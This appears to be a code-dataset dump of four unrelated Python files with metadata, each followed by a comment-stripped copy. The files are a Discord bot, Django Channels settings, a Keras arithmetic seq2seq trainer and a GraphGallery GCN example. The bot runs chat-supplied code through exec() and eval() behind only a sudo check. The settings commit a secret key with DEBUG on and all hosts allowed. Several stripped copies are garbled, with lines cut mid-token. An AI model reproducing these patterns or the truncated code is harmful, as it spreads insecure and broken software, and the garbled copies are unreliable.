        await send(message, "You must be a sudo user to do that!", reaction = "x")
    else:
        try:
            code = message.content[message.content.find("exec") + 4:].strip()
            # Unwrap ```python / ```py code fences and stray backticks.
            if code.startswith("```python"):
                code = code[9:]
            elif code.startswith("```py"):
                code = code[5:]
            code = code.strip("`")
            output = []
            # Shadow the builtin print so the executed code's output is
            # captured character-by-character into `output`.
            def print(*items, end = "\n", sep = " "):
                output.extend(list(sep.join(map(str, items)) + end))
            exec(code)
            # Cap at 1980 characters to stay under Discord's message limit
            # once the code fence is added.
            await send(message, "```python\n" + "".join(output[:1980]) + "\n```")
        except:
            await send(message, "Error executing expression!", reaction = "x")
@client.command("", ["adjust", "ehecd", "?"], "adjust ehecd <x>", "adjust the cooldown of ehe te nandayo")
async def command_adjust_ehecd(command, message):
    """Set the 'ehe te nandayo' cooldown in seconds (sudo-only).

    Renamed from `command_exec`, which collided with the exec handler defined
    just above; registration is via the decorator, so behavior is unchanged.
    """
    if message.author.id not in config["sudo"]:
        await send(message, "You must be a sudo user to do that!", reaction = "x")
    else:
        try:
            await set_data("ehecd", int(command[3]))
            await send(message, f"Cooldown of 'ehe te nandayo' is now {command[3]} second{'s' * (command[3] != '1')}!")
        except:
            await send(message, "Error; make sure you entered an integer!", reaction = "x")
@client.command("", ["data", "..."], "data", "fetch data from the bot")
async def command_data(command, message):
    """Dump a raw entry from the data store (sudo-only).

    SECURITY: each argument is passed through eval() to build the key path;
    acceptable only because access is gated on config["sudo"].
    """
    if message.author.id not in config["sudo"]:
        await send(message, "You must be a sudo user to do that!")
    else:
        # Truncated to fit Discord's message limit inside a code fence.
        await send(message, "```python\n" + str(await get_data(*map(eval, command[2:]), default = None, set_if_missing = False))[:1980] + "\n```")
@client.command("", ["identify", "?"], "identify <user>", "identify a user")
async def command_identify(command, message):
member = await get_member(message.guild, command[2], message.author)
await send(message, f"Identified {member.name}#{member.discriminator}, a.k.a {member.display_name}, I.D. {member.id} ({member.mention})", allowed_mentions = discord.AllowedMentions.none())
@client.command("", ["emoji", "?", "-"], "", "")
@client.command("", ["emoji", "?"], "emoji <lookup> [-]", "post an emoji by lookup ID")
async def command_emoji(command, message):
try:
await send(message, str(emoji(command[2])))
if len(command) == 4:
await message.delete()
except:
await send(message, "That resulted in an error.", reaction = "x")
raise
@client.command("", [("summary", "summarize"), "?"], "", "")
@client.command("", [("summary", "summarize"), "?", "?"], "", "")
@client.command("", [("summary", "summarize"), "?", "?", "?"], "", "")
async def command_summarize(command, message):
url = command[2]
if url[0] == "<" and url[-1] == ">":
url = url[1:-1]
await message.edit(suppress = True)
rurl = f"https://api.smmry.com/?SM_API_KEY={config['api-keys']['sm']}"
if len(command) >= 4:
rurl += "&SM_LENGTH=" + command[3]
if len(command) >= 5:
rurl += "&SM_KEYWORD_COUNT=" + command[4]
rurl += "&SM_URL=" + url
r = requests.get(rurl)
data = r.json()
if "sm_api_error" in data:
error = data["sm_api_error"]
if error == 0:
await send(message, "Internal server problem with the SMMRY API; this is not your fault. Try again later.", reaction = "x")
elif error == 1:
await send(message, "Parameters are invalid. Check that you entered a real URL; otherwise, contact a developer.", reaction = "x")
elif error == 2:
await send(message, "This request has intentionally been restricted. Perhaps you have expended the API key's limit (100 per day).", reaction = "x")
elif error == 3:
await send(message, "Summarization error. This website might not be summarizable.")
else:
await send(message, (f"**{data['sm_api_title'].strip() or '(no title)'}**\n\n{data['sm_api_content'].strip() or '(no content)'}")[:2000])
if "sm_api_keyword_array" in data:
await message.channel.send(f"**Keywords**: {', '.join(data['sm_api_keyword_array'])}")
@client.command("", ["tsr", "?"], "", "")
async def command_toggle_suppress_reacts(command, message):
member = await get_member(message.guild, command[2], message.author)
await mod_data("tsr", lambda x: x ^ {member.id}, default = set())
await message.add_reaction("✅")
@client.command("", ["react", "..."], "", "")
async def command_react(command, message):
if not message.reference or not message.reference.resolved:
raise BotError("You need to refer to a message via reply!")
fails = []
for x in command[2:]:
try:
await message.reference.resolved.add_reaction(emoji(x))
except:
fails.append(x)
if fails:
await send(message, "The following emojis do not exist / could not have been added: " + ", ".join(fails))
else:
await message.delete()
# @client.command("", re.compile(r"\b[hH]?[eE][hH][eE]\b").search, "", "")
async def command_ehe_te_nandayo(command, message):
if message.author != client.user and time.time() - await get_data("ehe", message.author.id, default = 0) > (await get_data("ehecd", default = 30)):
await send(message, "**ehe te nandayo!?**", reaction = "?")
await set_data("ehe", message.author.id, time.time())
# @client.command("", re.compile(r"\[\w+\]").search, "", "")
async def command_emoji_react(command, message):
for c in re.findall(r"\[(\w+)\]", message.content):
try:
await message.add_reaction(emoji(c))
except:
pass
# @client.command("", re.compile(r"\b[Aa][Oo][Cc]\b").search, "", "")
async def command_aoc(command, message):
await message.channel.send("Alexandria Ocasio-Cortez")
# @client.command("", ["toggle69"], "", "")
async def command_toggle69(command, message):
await set_data("disable_69", not await get_data("disable_69", default = False))
await message.add_reaction("✅")
# @client.command("", re.compile(r"\b69\b").search, "", "")
async def command_69(command, message):
if await get_data("disable_69", default = False):
return
await message.reply("nice", mention_author = False) | true | true |
f722fb3d7cbf83a809ebb0d0351a924f41916c3e | 3,491 | py | Python | src/cfehome/settings.py | kuntalbanik/channels-rapid | 797939f3dc62d8b9424517ce6e4d3ea946330669 | [
"MIT"
] | null | null | null | src/cfehome/settings.py | kuntalbanik/channels-rapid | 797939f3dc62d8b9424517ce6e4d3ea946330669 | [
"MIT"
] | null | null | null | src/cfehome/settings.py | kuntalbanik/channels-rapid | 797939f3dc62d8b9424517ce6e4d3ea946330669 | [
"MIT"
] | null | null | null | """
Django settings for cfehome project.
Generated by 'django-admin startproject' using Django 2.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load it
# from an environment variable before any real deployment.
SECRET_KEY = 'em-9$ln6^a0z!s2pbo=mu*l$cgnqgsyd_z21f-%2d(_h7*wu^0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# '*' accepts any Host header — convenient for local dev, unsafe in production.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'channels',
    'chat',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cfehome.urls'
# Channels entry point: the ASGI application lives in cfehome/routing.py.
ASGI_APPLICATION = "cfehome.routing.application"
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'cfehome.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
# Channel layer backing store: a local Redis instance on the default port.
CHANNEL_LAYERS = {
    "default": {
        "BACKEND": "channels_redis.core.RedisChannelLayer",
        "CONFIG": {
            "hosts": [("localhost", 6379)],
            # For heroku
            # "hosts": [os.environ.get('REDIS_URL', 'redis://localhost:6379')],
        },
    },
}
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'em-9$ln6^a0z!s2pbo=mu*l$cgnqgsyd_z21f-%2d(_h7*wu^0'
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'channels',
'chat',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cfehome.urls'
ASGI_APPLICATION = "cfehome.routing.application"
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cfehome.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [("localhost", 6379)],
# For heroku
# "hosts": [os.environ.get('REDIS_URL', 'redis://localhost:6379')],
},
},
} | true | true |
f722fbdc8a2912619c3582d0d56c9652a27d6fb1 | 7,839 | py | Python | addition-subtractor.py | rapirent/DSAI-HW3 | ee83990f511049b8d53be5765040ab2068af6c3f | [
"MIT"
] | 1 | 2020-06-12T17:24:26.000Z | 2020-06-12T17:24:26.000Z | addition-subtractor.py | kuoteng/Arithmetic-Operation-Seq2Seq | ee83990f511049b8d53be5765040ab2068af6c3f | [
"MIT"
] | null | null | null | addition-subtractor.py | kuoteng/Arithmetic-Operation-Seq2Seq | ee83990f511049b8d53be5765040ab2068af6c3f | [
"MIT"
] | null | null | null |
# coding: utf-8
from keras.models import Sequential
from keras import layers
import numpy as np
import matplotlib.pyplot as plt
from six.moves import range
import os
import argparse
parser = argparse.ArgumentParser()
# All hyper-parameters arrive as strings and are converted to int below.
parser.add_argument('--data_size', default='45000')
parser.add_argument('--train_size', default='40000')
parser.add_argument('--digits', default='3')
parser.add_argument('--epoch', default='2')
parser.add_argument('--activation', default='softmax')
parser.add_argument('--output_name', default='model_1')
args = parser.parse_args()
# # Parameters Config
class colors:
    # ANSI escape codes used to colour the ☑/☒ prediction markers below.
    ok = '\033[92m'
    fail = '\033[91m'
    close = '\033[0m'
DATA_SIZE = int(args.data_size)
TRAIN_SIZE = int(args.train_size)
DIGITS = int(args.digits)
REVERSE = False
# Longest possible input: DIGITS digits + one operator + DIGITS digits.
MAXLEN = DIGITS + 1 + DIGITS
# Model alphabet: digits, both operators, and the padding space.
chars = '0123456789+- '
RNN = layers.LSTM
HIDDEN_SIZE = 128
BATCH_SIZE = 128
EPOCH_SIZE = int(args.epoch)
LAYERS = 1
ACTIVATION = args.activation
# Run log; the metrics printed below are mirrored into this file.
output_file = open('./data/as-' + args.output_name, 'w')
print('DATA_SIZE = ', DATA_SIZE , file=output_file)
print('TRAIN_SIZE = ', TRAIN_SIZE, file=output_file)
print('DIGITS = ', DIGITS, file=output_file)
print('EPOCH_SIZE = ', EPOCH_SIZE, file=output_file)
print('ACTIVATION = ', ACTIVATION, file=output_file)
class CharacterTable(object):
    """Bidirectional mapping between characters and one-hot rows.

    Builds a sorted, de-duplicated alphabet from ``chars`` and offers
    ``encode`` (string -> one-hot matrix) and ``decode`` (the inverse).
    """
    def __init__(self, chars):
        self.chars = sorted(set(chars))
        self.char_indices = {c: i for i, c in enumerate(self.chars)}
        self.indices_char = {i: c for i, c in enumerate(self.chars)}
    def encode(self, C, num_rows):
        """One-hot encode string ``C`` into a (num_rows, alphabet-size) matrix."""
        encoded = np.zeros((num_rows, len(self.chars)))
        for row, ch in enumerate(C):
            encoded[row, self.char_indices[ch]] = 1
        return encoded
    def decode(self, x, calc_argmax=True):
        """Turn a one-hot matrix (or, with calc_argmax=False, an index
        sequence) back into a string."""
        indices = x.argmax(axis=-1) if calc_argmax else x
        return "".join(self.indices_char[i] for i in indices)
ctable = CharacterTable(chars)
# (Removed a leftover notebook-cell expression `ctable.indices_char`,
# which evaluated the attribute and discarded the result.)
# # Data Generation
# Build DATA_SIZE unique "a-b" / "a+b" questions (alternating), each padded to
# MAXLEN characters, with answers padded to DIGITS + 1 characters.
questions = []
expected = []
seen = set()
print('Generating data...')
def f():
    # Random operand with 1..DIGITS digits. Hoisted out of the loop — the
    # original rebuilt this lambda on every iteration although it is invariant.
    return int(''.join(np.random.choice(list('0123456789')) for i in range(np.random.randint(1, DIGITS + 1))))
while len(questions) < DATA_SIZE:
    a, b = f(), f()
    # Alternate between subtraction and addition examples.
    if len(questions) % 2 == 0:
        q = '{}-{}'.format(a, b)
        query = q + ' ' * (MAXLEN - len(q))
        ans = str(a - b)
    else:
        q = '{}+{}'.format(a, b)
        query = q + ' ' * (MAXLEN - len(q))
        ans = str(a + b)
    # Skip duplicates so the later train/test split cannot contain the same
    # question twice.
    if q in seen:
        continue
    seen.add(q)
    ans += ' ' * (DIGITS + 1 - len(ans))
    if REVERSE:
        query = query[::-1]
    questions.append(query)
    expected.append(ans)
print('Total addition questions:', len(questions))
print(questions[:5], expected[:5])
# # Processing
print('Vectorization... (to the one-hot encoding)')
# dtype=bool replaces the former dtype=np.bool: the np.bool alias was
# deprecated in NumPy 1.20 and removed in 1.24, so the old spelling raises
# AttributeError on current NumPy. Behavior is identical.
x = np.zeros((len(questions), MAXLEN, len(chars)), dtype=bool)
y = np.zeros((len(expected), DIGITS + 1, len(chars)), dtype=bool)
for i, sentence in enumerate(questions):
    x[i] = ctable.encode(sentence, MAXLEN)
for i, sentence in enumerate(expected):
    y[i] = ctable.encode(sentence, DIGITS + 1)
# Shuffle questions and answers with the same permutation.
indices = np.arange(len(y))
np.random.shuffle(indices)
print(indices)
x = x[indices]
y = y[indices]
# train_test_split
train_x = x[:TRAIN_SIZE]
train_y = y[:TRAIN_SIZE]
test_x = x[TRAIN_SIZE:]
test_y = y[TRAIN_SIZE:]
print('Training Data:')
print(train_x.shape)
print(train_y.shape)
# Hold out the final 10% of the training set for validation.
split_at = len(train_x) - len(train_x) // 10
print('split_at', split_at)
(x_train, x_val) = train_x[:split_at], train_x[split_at:]
(y_train, y_val) = train_y[:split_at], train_y[split_at:]
print('Training Data:')
print(x_train.shape)
print(y_train.shape)
print('Validation Data:')
print(x_val.shape)
print(y_val.shape)
print('Testing Data:')
print(test_x.shape)
print(test_y.shape)
print("input: ", x_train[:3], '\n\n', "label: ", y_train[:3])
# # Build Model
print('Build model...')
# Encoder-decoder seq2seq: an LSTM reads the padded question, its final state
# is repeated DIGITS + 1 times, and decoder LSTM(s) emit one character each.
model = Sequential()
model.add(RNN(HIDDEN_SIZE, input_shape=(MAXLEN, len(chars))))
model.add(layers.RepeatVector(DIGITS + 1))
for _ in range(LAYERS):
    model.add(RNN(HIDDEN_SIZE, return_sequences=True))
# Per-timestep dense + activation maps each decoder step to the alphabet.
model.add(layers.TimeDistributed(layers.Dense(len(chars))))
model.add(layers.Activation(ACTIVATION))
model.compile(loss='categorical_crossentropy',
              optimizer='adam',
              metrics=['accuracy'])
model.summary()
print('train set = ', x_train.shape, 'validation set = ', x_val.shape, file=output_file)
# Accumulated across all 100 outer loops for the final plots.
acc = []
val_acc = []
loss = []
val_loss = []
# # Training
# NOTE(review): history keys 'acc'/'val_acc' and predict_classes() assume an
# older Keras; newer releases use 'accuracy' and removed predict_classes —
# confirm the pinned framework version before running.
for loop in range(100):
    print()
    print('-' * 50)
    print('Train Loop Num:', loop)
    history = model.fit(x_train, y_train,
                        batch_size=BATCH_SIZE,
                        epochs=EPOCH_SIZE,
                        validation_data=(x_val, y_val),
                        shuffle=True)
    acc += history.history['acc']
    val_acc += history.history['val_acc']
    loss += history.history['loss']
    val_loss += history.history['val_loss']
    print('loop ', loop, file=output_file)
    print('acc = {} '.format(history.history['acc']), end='', file=output_file)
    print('val_acc = {} '.format(history.history['val_acc']), end='', file=output_file)
    print('loss = {} '.format(history.history['loss']), end='', file=output_file)
    print('val_loss = {} '.format(history.history['val_loss']), file=output_file)
    print('-' * 50 , file=output_file)
    # Spot-check 10 random validation samples after each loop.
    for i in range(10):
        ind = np.random.randint(0, len(x_val))
        rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])]
        preds = model.predict_classes(rowx, verbose=0)
        q = ctable.decode(rowx[0])
        correct = ctable.decode(rowy[0])
        guess = ctable.decode(preds[0], calc_argmax=False)
        print('Q', q[::-1] if REVERSE else q, end=' ')
        print('T', correct, end=' ')
        if correct == guess:
            print(colors.ok + '☑' + colors.close, end=' ')
        else:
            print(colors.fail + '☒' + colors.close, end=' ')
        print(guess)
# # Testing
print("MSG : Prediction")
print("-" * 50)
# Exact-match accuracy over the held-out test set: a prediction counts as
# right only if the whole decoded answer string matches.
right = 0
preds = model.predict_classes(test_x, verbose=0)
for i in range(len(preds)):
    q = ctable.decode(test_x[i])
    correct = ctable.decode(test_y[i])
    guess = ctable.decode(preds[i], calc_argmax=False)
    print('Q', q[::-1] if REVERSE else q, end=' ')
    print('T', correct, end=' ')
    if correct == guess:
        print(colors.ok + '☑' + colors.close, end=' ')
        right += 1
    else:
        print(colors.fail + '☒' + colors.close, end=' ')
    print(guess)
print("MSG : Accuracy is {}".format(right / len(preds)))
print("MSG : Accuracy is {}".format(right / len(preds)), file=output_file)
model.save('./models/as-' + args.output_name + '.h5')
# Dump the decoded train/validation/test splits as CSV corpora.
# NOTE(review): the loop variables (x, y) below rebind the module-level x/y
# arrays from vectorization — harmless here since they are no longer used.
with open('./corpus/as-' + args.output_name + '-training-corpus.csv', 'w') as corpus:
    print('questions,expected', file=corpus)
    for (x, y) in zip(x_train, y_train):
        print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-validation-corpus.csv', 'w') as corpus:
    print('questions,expected', file=corpus)
    for (x, y) in zip(x_val, y_val):
        print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-testing-corpus.csv', 'w') as corpus:
    print('questions,expected', file=corpus)
    for (x, y) in zip(test_x, test_y):
        print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
# Accuracy curve over all accumulated epochs.
plt.plot(acc)
plt.plot(val_acc)
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-accuracy-' + args.output_name + '.png')
plt.clf()
# summarize history for loss
plt.plot(loss)
plt.plot(val_loss)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-loss-' + args.output_name + '.png')
output_file.close()
plt.clf()
from keras.models import Sequential
from keras import layers
import numpy as np
import matplotlib.pyplot as plt
from six.moves import range
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_size', default='45000')
parser.add_argument('--train_size', default='40000')
parser.add_argument('--digits', default='3')
parser.add_argument('--epoch', default='2')
parser.add_argument('--activation', default='softmax')
parser.add_argument('--output_name', default='model_1')
args = parser.parse_args()
ok = '\033[92m'
fail = '\033[91m'
close = '\033[0m'
DATA_SIZE = int(args.data_size)
TRAIN_SIZE = int(args.train_size)
DIGITS = int(args.digits)
REVERSE = False
MAXLEN = DIGITS + 1 + DIGITS
chars = '0123456789+- '
RNN = layers.LSTM
HIDDEN_SIZE = 128
BATCH_SIZE = 128
EPOCH_SIZE = int(args.epoch)
LAYERS = 1
ACTIVATION = args.activation
output_file = open('./data/as-' + args.output_name, 'w')
print('DATA_SIZE = ', DATA_SIZE , file=output_file)
print('TRAIN_SIZE = ', TRAIN_SIZE, file=output_file)
print('DIGITS = ', DIGITS, file=output_file)
print('EPOCH_SIZE = ', EPOCH_SIZE, file=output_file)
print('ACTIVATION = ', ACTIVATION, file=output_file)
class CharacterTable(object):
def __init__(self, chars):
self.chars = sorted(set(chars))
self.char_indices = dict((c, i) for i, c in enumerate(self.chars))
self.indices_char = dict((i, c) for i, c in enumerate(self.chars))
def encode(self, C, num_rows):
x = np.zeros((num_rows, len(self.chars)))
for i, c in enumerate(C):
x[i, self.char_indices[c]] = 1
return x
def decode(self, x, calc_argmax=True):
if calc_argmax:
x = x.argmax(axis=-1)
return "".join(self.indices_char[i] for i in x)
ctable = CharacterTable(chars)
ctable.indices_char
xpected = []
seen = set()
print('Generating data...')
while len(questions) < DATA_SIZE:
f = lambda: int(''.join(np.random.choice(list('0123456789')) for i in range(np.random.randint(1, DIGITS + 1))))
a, b = f(), f()
if len(questions) % 2 == 0:
q = '{}-{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a - b)
else:
q = '{}+{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a + b)
if q in seen:
continue
seen.add(q)
ans += ' ' * (DIGITS + 1 - len(ans))
if REVERSE:
query = query[::-1]
questions.append(query)
expected.append(ans)
print('Total addition questions:', len(questions))
print(questions[:5], expected[:5])
orization... (to the one-hot encoding)')
x = np.zeros((len(questions), MAXLEN, len(chars)), dtype=np.bool)
y = np.zeros((len(expected), DIGITS + 1, len(chars)), dtype=np.bool)
for i, sentence in enumerate(questions):
x[i] = ctable.encode(sentence, MAXLEN)
for i, sentence in enumerate(expected):
y[i] = ctable.encode(sentence, DIGITS + 1)
indices = np.arange(len(y))
np.random.shuffle(indices)
print(indices)
x = x[indices]
y = y[indices]
train_x = x[:TRAIN_SIZE]
train_y = y[:TRAIN_SIZE]
test_x = x[TRAIN_SIZE:]
test_y = y[TRAIN_SIZE:]
print('Training Data:')
print(train_x.shape)
print(train_y.shape)
split_at = len(train_x) - len(train_x) // 10
print('split_at', split_at)
(x_train, x_val) = train_x[:split_at], train_x[split_at:]
(y_train, y_val) = train_y[:split_at], train_y[split_at:]
print('Training Data:')
print(x_train.shape)
print(y_train.shape)
print('Validation Data:')
print(x_val.shape)
print(y_val.shape)
print('Testing Data:')
print(test_x.shape)
print(test_y.shape)
print("input: ", x_train[:3], '\n\n', "label: ", y_train[:3])
model...')
model = Sequential()
model.add(RNN(HIDDEN_SIZE, input_shape=(MAXLEN, len(chars))))
model.add(layers.RepeatVector(DIGITS + 1))
for _ in range(LAYERS):
model.add(RNN(HIDDEN_SIZE, return_sequences=True))
model.add(layers.TimeDistributed(layers.Dense(len(chars))))
model.add(layers.Activation(ACTIVATION))
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
print('train set = ', x_train.shape, 'validation set = ', x_val.shape, file=output_file)
acc = []
val_acc = []
loss = []
val_loss = []
in range(100):
print()
print('-' * 50)
print('Train Loop Num:', loop)
history = model.fit(x_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCH_SIZE,
validation_data=(x_val, y_val),
shuffle=True)
acc += history.history['acc']
val_acc += history.history['val_acc']
loss += history.history['loss']
val_loss += history.history['val_loss']
print('loop ', loop, file=output_file)
print('acc = {} '.format(history.history['acc']), end='', file=output_file)
print('val_acc = {} '.format(history.history['val_acc']), end='', file=output_file)
print('loss = {} '.format(history.history['loss']), end='', file=output_file)
print('val_loss = {} '.format(history.history['val_loss']), file=output_file)
print('-' * 50 , file=output_file)
for i in range(10):
ind = np.random.randint(0, len(x_val))
rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])]
preds = model.predict_classes(rowx, verbose=0)
q = ctable.decode(rowx[0])
correct = ctable.decode(rowy[0])
guess = ctable.decode(preds[0], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
SG : Prediction")
print("-" * 50)
right = 0
preds = model.predict_classes(test_x, verbose=0)
for i in range(len(preds)):
q = ctable.decode(test_x[i])
correct = ctable.decode(test_y[i])
guess = ctable.decode(preds[i], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
right += 1
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
print("MSG : Accuracy is {}".format(right / len(preds)))
print("MSG : Accuracy is {}".format(right / len(preds)), file=output_file)
model.save('./models/as-' + args.output_name + '.h5')
with open('./corpus/as-' + args.output_name + '-training-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_train, y_train):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-validation-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_val, y_val):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-testing-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(test_x, test_y):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
plt.plot(acc)
plt.plot(val_acc)
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-accuracy-' + args.output_name + '.png')
plt.clf()
plt.plot(loss)
plt.plot(val_loss)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-loss-' + args.output_name + '.png')
output_file.close()
plt.clf()
| true | true |
f722fd5eb426dd588840264e173ac746d19da740 | 782 | py | Python | examples/Graph_Neural_Networks/PyTorch/TrimmedGCN.py | EdisonLeeeee/GraphGallery | 4eec9c5136bda14809bd22584b26cc346cdb633b | [
"MIT"
] | 300 | 2020-08-09T04:27:41.000Z | 2022-03-30T07:43:41.000Z | examples/Graph_Neural_Networks/PyTorch/TrimmedGCN.py | EdisonLeeeee/GraphGallery | 4eec9c5136bda14809bd22584b26cc346cdb633b | [
"MIT"
] | 5 | 2020-11-05T06:16:50.000Z | 2021-12-11T05:05:22.000Z | examples/Graph_Neural_Networks/PyTorch/TrimmedGCN.py | EdisonLeeeee/GraphGallery | 4eec9c5136bda14809bd22584b26cc346cdb633b | [
"MIT"
] | 51 | 2020-09-23T15:37:12.000Z | 2022-03-05T01:28:56.000Z | #!/usr/bin/env python
# coding: utf-8
import torch
import graphgallery
print("GraphGallery version: ", graphgallery.__version__)
print("Torch version: ", torch.__version__)
'''
Load Datasets
- cora/citeseer/pubmed
'''
from graphgallery.datasets import NPZDataset
# Load the Cora citation graph; 'standardize' is applied at load time —
# presumably a canonicalizing transform; confirm in the GraphGallery docs.
data = NPZDataset('cora', root="~/GraphData/datasets/", verbose=False, transform='standardize')
graph = data.graph
# Fixed random_state keeps the train/val/test node split reproducible.
splits = data.split_nodes(random_state=15)
graphgallery.set_backend("pytorch")
from graphgallery.gallery.nodeclas import TrimmedGCN
# Train a TrimmedGCN node classifier on GPU with a fixed seed.
trainer = TrimmedGCN(device="gpu", seed=123).setup_graph(graph).build()
trainer.fit(splits.train_nodes, splits.val_nodes, verbose=1, epochs=100)
results = trainer.evaluate(splits.test_nodes)
print(f'Test loss {results.loss:.5}, Test accuracy {results.accuracy:.2%}')
| 30.076923 | 95 | 0.774936 |
import torch
import graphgallery
print("GraphGallery version: ", graphgallery.__version__)
print("Torch version: ", torch.__version__)
from graphgallery.datasets import NPZDataset
data = NPZDataset('cora', root="~/GraphData/datasets/", verbose=False, transform='standardize')
graph = data.graph
